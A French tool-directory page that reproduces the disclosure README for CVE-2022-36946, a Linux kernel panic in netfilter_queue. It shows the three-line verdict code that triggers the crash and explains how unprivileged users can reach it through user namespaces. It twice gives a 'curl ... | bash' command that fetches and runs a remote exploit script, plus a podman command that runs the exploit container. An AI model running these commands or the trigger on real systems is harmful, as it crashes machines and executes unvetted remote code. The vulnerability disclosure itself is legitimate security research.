Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-36946 — CVE-2022-36946 panique du noyau linux dans netfilter_queue | Kitploit
Outils/GitHubGitHub/pwnzer0tt1/cve-2022-36946
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationÉvasion de Conteneur
GitHubpwnzer0tt1/cve-2022-36946

CVE-2022-36946

CVE-2022-36946 panique du noyau linux dans netfilter_queue

Voir le dépôt
225il y a 2 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web

CVE-2022-36946

Signalé par : Domingo Dirutigliano et Nicola Guerrera

Alors que nous travaillions sur firegex, notre pare-feu applicatif pour les compétitions CTF Attaque-Défense, nous sommes tombés sur quelques paniques du noyau.

Ce comportement étrange a ensuite été isolé et analysé, conduisant à la découverte de cette faille de sécurité potentielle dans le module netfilter, plus précisément avec nfnetlink.

Comment ça marche ?

Le noyau panique lors de l'envoi d'un verdict nf_queue avec un attribut nfta_payload de 0 octet.

root@kitploit:~
nlh = nfq_nlmsg_put(buf, NFQNL_MSG_VERDICT, queue_num);
nfq_nlmsg_verdict_put_pkt(nlh, NULL, 0);
nfq_nlmsg_verdict_put(nlh, 1, NF_ACCEPT );

Cela se produit car la pile IP/IPv6 extrait l'en-tête IP(v6) du paquet après le hook d'entrée.

Donc, si l'utilisateur tronque le paquet en dessous de la taille de l'en-tête, cet appel à skb_pull() produira un skb mal formé entraînant une panique.

Essayez en exécutant curl -sLf https://pwnzer0tt1.it/cve-2022-36946.sh | bash également avec un utilisateur non privilégié (plus de détails ci-dessous).

Avons-nous vraiment besoin de root...?

En utilisant les espaces de noms Linux, en particulier les espaces de noms utilisateur (activés via kernel.unprivileged_userns_clone=1), un utilisateur normal peut créer un espace de noms réseau, lui permettant d'utiliser les mêmes primitives du noyau qui déclenchent la panique. Cela vous permettra d'utiliser la vulnérabilité sans avoir les droits root.

Ce scénario n'est pas rare : par exemple podman utilise cette option pour exécuter ses conteneurs (sans root), et sur certaines distributions cette option est activée par défaut.

Vous pouvez également essayer d'exécuter l'exploit sans privilèges root en exécutant :

root@kitploit:~
podman run -it --cap-add NET_ADMIN ghcr.io/pwnzer0tt1/cve-2022-36946

ou si vous voulez le tester à la volée (seuls tar et curl doivent être installés) :

root@kitploit:~
curl -sLf https://pwnzer0tt1.it/cve-2022-36946.sh | bash

Correction

Corrigé dans le noyau Linux 5.19 voir la diff

Correctif original par l'équipe de sécurité du noyau Linux ici

Prérequis pour exploiter cette vulnérabilité :

  • Un noyau Linux vulnérable
  • La capacité CAP_NET_ADMIN (également dans un espace de noms)

Pourquoi panic6 ?

Cela a fonctionné à la 6e tentative, donc nous avons gardé le nom.

Une nouvelle façon d'éteindre votre PC :

terminal_speed

Présentation pour DevFest-2023

https://docs.google.com/presentation/d/1SoSFxpfQ02_ZkLKFMxpkgst3F56sBiQN3FfNfTutxUs/edit?usp=sharing

Télécharger l’outil